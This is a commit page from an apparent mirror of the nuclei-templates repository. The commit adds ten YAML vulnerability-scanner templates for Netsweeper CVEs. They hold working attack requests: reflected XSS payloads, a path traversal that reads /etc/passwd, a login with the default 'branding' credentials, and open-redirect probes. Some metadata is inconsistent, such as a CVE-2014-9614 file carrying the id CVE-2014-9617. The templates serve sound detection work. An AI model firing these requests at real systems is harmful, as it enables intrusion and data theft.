daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add 10 templates and edit 1 workflows

patch-1
daffainfo 2021-12-06 23:38:54 +07:00
parent ac75077e75
commit b90d0b7e3e
11 changed files with 268 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
cves/2014/CVE-2014-9606.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2014-9606
info:
name: Netsweeper 4.0.8 - Cross Site Scripting Injection
author: daffainfo
severity: medium
reference: https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
tags: cve,cve2014,netsweeper,xss
requests:
- method: GET
path:
- '{{BaseURL}}/webadmin/policy/category_table_ajax.php?customctid=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- '"><script>alert(1)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
cves/2014/CVE-2014-9607.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2014-9607
info:
name: Netsweeper 4.0.4 - Cross Site Scripting Injection
author: daffainfo
severity: medium
reference: https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
tags: cve,cve2014,netsweeper,xss
requests:
- method: GET
path:
- '{{BaseURL}}/remotereporter/load_logfiles.php?server=018192&url=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- '"><script>alert(1)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
cves/2014/CVE-2014-9608.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2014-9608
info:
name: Netsweeper 4.0.3 - Cross Site Scripting Injection
author: daffainfo
severity: medium
reference: https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
tags: cve,cve2014,netsweeper,xss
requests:
- method: GET
path:
- '{{BaseURL}}/webadmin/policy/group_table_ajax.php/%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- '"><script>alert(1)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

23
cves/2014/CVE-2014-9609.yaml Normal file
View File

@ -0,0 +1,23 @@
id: CVE-2014-9609
info:
name: Netsweeper 4.0.8 - Directory Traversal
author: daffainfo
severity: medium
reference: https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
tags: cve,cve2014,netsweeper,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

31
cves/2014/CVE-2014-9614.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2014-9617
info:
name: Netsweeper 4.0.5 - Default Weak Account
author: daffainfo
severity: medium
reference: https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
tags: cve,cve2021,netsweeper
requests:
- raw:
- |
POST /webadmin/auth/verification.php HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
login=branding&password=branding&Submit=Login
cookie-reuse: true
matchers-condition: and
matchers:
- type: status
status:
- 302
- type: word
words:
- 'Location: ../common/'
- 'Set-Cookie: webadminU='
part: header
condition: and

29
cves/2014/CVE-2014-9615.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2014-9615
info:
name: Netsweeper 4.0.4 - Cross Site Scripting Injection
author: daffainfo
severity: medium
reference: https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
tags: cve,cve2014,netsweeper,xss
requests:
- method: GET
path:
- '{{BaseURL}}/webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname=<group_name_eg_netsweeper_student_allow_internet_access&policyname=auto_created&username=root&userip=127.0.0.1&connectionip=127.0.0.1&nsphostname=netsweeper&url=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- '"><script>alert(1)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

20
cves/2014/CVE-2014-9617.yaml Normal file
View File

@ -0,0 +1,20 @@
id: CVE-2014-9617
info:
name: Netsweeper 3.0.6 - Open Redirection
author: daffainfo
severity: medium
description: Netsweeper version 3.0.6 was vulnerable to an Unauthenticated and Authenticated Open Redirect vulnerability.
reference: https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
tags: cve,cve2021,netsweeper,redirect
requests:
- method: GET
path:
- "{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://example.com/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
part: header

27
cves/2014/CVE-2014-9618.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2014-9618
info:
name: Netsweeper 4.0.8 - Authentication Bypass (New Profile Creation)
author: daffainfo
severity: medium
reference: https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
tags: cve,cve2014,netsweeper,xss
requests:
- method: GET
path:
- '{{BaseURL}}/webadmin/clientlogin/?srid=&action=showdeny&url='
matchers-condition: and
matchers:
- type: word
words:
- 'name=formtag action="../clientlogin/?srid=&action=showdeny&url="'
- 'placeholder="Profile Manager">'
- '<title>Netsweeper WebAdmin</title>'
part: body
condition: and
- type: status
status:
- 200

20
vulnerabilities/netsweeper/netsweeper-open-redirect.yaml Normal file
View File

@ -0,0 +1,20 @@
id: netsweeper-open-redirect
info:
name: Netsweeper 4.0.9 - Open Redirection
author: daffainfo
severity: medium
description: Netsweeper version 4.0.9 was vulnerable to an Unauthenticated and Authenticated Open Redirect vulnerability.
reference: https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
tags: netsweeper,redirect
requests:
- method: GET
path:
- "{{BaseURL}}/webadmin/authportal/bounce.php?url=https://example.com/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
part: header

29
vulnerabilities/netsweeper/netsweeper-reflected-xss.yaml Normal file
View File

@ -0,0 +1,29 @@
id: netsweeper-reflected-xss
info:
name: Netsweeper 4.0.9 - Cross Site Scripting Injection
author: daffainfo
severity: medium
reference: https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
tags: netsweeper,xss
requests:
- method: GET
path:
- '{{BaseURL}}/webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&offset=&sortitem=&filter='
matchers-condition: and
matchers:
- type: word
words:
- '"><script>alert(1)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

4
workflows/netsweeper-workflow.yaml
View File

@ -2,10 +2,10 @@ id: netsweeper-workflow
info:
name: Netsweeper Security Checks
author: dwisiswant0
author: dwisiswant0,daffainfo
description: A simple workflow that runs all netsweeper related nuclei templates on a given target.
workflows:
- template: technologies/netsweeper-webadmin-detect.yaml
subtemplates:
- template: cves/2020/CVE-2020-13167.yaml
- tags: netsweeper